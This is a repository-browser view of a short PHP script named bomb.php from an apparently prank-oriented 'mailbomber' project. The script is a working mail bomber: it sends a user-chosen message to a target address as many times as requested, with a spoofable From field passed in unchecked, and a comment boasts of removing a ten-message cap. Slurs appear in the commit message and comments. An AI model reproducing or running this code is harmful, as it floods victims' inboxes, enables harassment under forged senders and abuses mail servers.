source: trollforge/misc/mailbomber/bomb.php @ 622

Revision 605, 450 bytes checked in by literalka, 16 months ago (diff)

more sorting, jesus fuck

Line 
1<html><title>Email Sent</title>
2<?php
3echo "You IP has been recorded for safety reasons: ";
4echo $_SERVER['REMOTE_ADDR']."<p />";
5echo "8";
6 $number = 1;
7 do {
8   mail($_POST['toaddress'], $_POST['subject'], $_POST['message'], $_POST['from']);
9     echo "=";
10     $number++;
11     }
12    while ($number <= $_POST['amount']);
13echo "D";
14
15// Narlcock - removed gay 10 limit "bug"
16?>
17<p />
18
19This script has been tweaked by NARLCOCK. 2005. COPYRIGHT.</html>
Note: See TracBrowser for help on using the repository browser.